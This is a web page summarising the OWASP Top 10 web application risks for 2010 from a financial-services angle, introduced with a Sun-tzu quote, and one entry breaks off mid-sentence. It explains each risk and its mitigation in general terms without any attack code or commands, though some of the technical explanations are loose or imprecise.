Know the Enemy | It is said that one who knows the enemy and knows himself will not be endangered in a hundred engagements. One who does not know the emeny, but knows himself will sometimes be victorious, sometimes meet with defeat. One who knows neither the enemy nor himself will invariably be defeated in every engagment. Sun-tzu "The Art of War" Chapter 3 |
| Your Enemy Knows You | Before starting an attack, the enemy will spend some time learning about the weakness of your site. He will most likely create an account to learn login processes and sniff packets during the logon on other processes. He will also study other attackers that have been successful and listen to the chatter on blogs and other gatherings. He will pay for information on attacks that have not been used before and will try to limit disclosure of them. He really does not want you to know what he is up to. |
OWASP Top 10 for 2010 | On April 19, 2010 the Open Web Application Security Project released the final version of the Top 10 for 2010, and here is their press release. The following is this site's interpretation of these attacks for financial services. The links below will download their documentation: |
| 1: Injection | In an injection attack the objective is to insert code into the URL sent to a site that will be forwarded to one of the back-end servers to cause it to leak information. Typically the attack is against SQL servers that are driven directly by script code sent from the user's browser in the URL The best mitigation for this attack is to NEVER take any part of the URL in the web server and forward it to another computer. Always interpret the URL in the web browser and construct any message to other servers entirely in the web server. No code from the browser should ever be trusted to run on any server at any time. |
2: Cross-Site Scripting (XSS) | Cross-site scripting is like the Injection attack in that the attacker inserts code (usually HTML) into the URL that is sent by the web server and returned to the web browser. The code is then interpreted by the web browser causing it to release information to the attacker. These first two attacks are instances of the more general problem that occurs whenever one set of code is embedded in another. The migitigation is the same as above. Do not copy any information from the incoming URL direclty into the response to the browser. Assume that any URL contains an attack. |
| 3: Broken Authentication and Session Management | This attack can occur then the web site does not implement authentication correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities. |
| 4: Insecure Direct Object References | Data objects that are referenced direclty from a web page might include files, directories or data base objects. Hackers will test these objects to see if it is possible to over-write them with infected objects. Several cases of Word or Acrobat exploits have been discovered that will allow the attacker to take over a computer with a mal-formed file. Be sure that is not possible from your web site. |
| 5: Cross-Site Request Forgery (CSRF) | The attack works by adding a link or script to some site that user might be browsing. That link inlcudes an access to another site to which the user is assumed to have already athenticated. Since most authentication information is contained in a cookie or other automatic response from the brower, the other web site will get valid user authentication information and assume that the user is making a legitimate request which it processses. |
| 6: Security Misconfiguration | Creating a secure web server requires attention to all of the details of the configuration especially as some web servers are not secure by default. Maintaining a secure web site means that changes are all given a security analysis before deployment and that all security updates from the vendors get applied as soon as possible. Attackers depend on a lag between the release of a security patch and the time it is applied. |
| 7: Insecure Cryptographic Storage | Any identity or authentication information given to a site by a user needs to be protected with strong cryptography that cannot be circumvented by an attacker. All concentrations of such information is valuabl to hackers at the target of extensive attacks. The credit card industry standard, PCI-DSS, is designed to address this issue, but recent exploits have demonstrated that more attention to the problem is needed than treating it as a simple check-off item. |
| 8: Failure to Restrict URL Access | Applications that are embedded in web servers typically check the access rights of URLs. But these checks are typically added on top of Access Control Lists (ACLs) from the operating system and so are not seen by applications operating outside of web servers. If such applications are running as a part of a web site, the accesses nee |
| 9: Insufficient Transport Layer Protection | Support for Transport Layer Security (TLS aka SSL) is fully supported by most web servers, but often avoided due to imagined cost of operations. With modern computers this should no longer be an issue. Also be sure that the SSL certificates are kept up todate and evaluate the benefits of Extended Validation (EV) certificates so that your users can be sure that they are on the correct site. Attacks agasinst the transport layer are difficult, but have increased in recent years. |
10: Unvalidated Redirects and Forwards | Your web site users depend on safe behavior while using your resources. It is important to your brand that all links and redirects are to valid sites. Without propoer validation you might find that attackers have repurpose links or ads hosted on your site to go to their attack pages.
|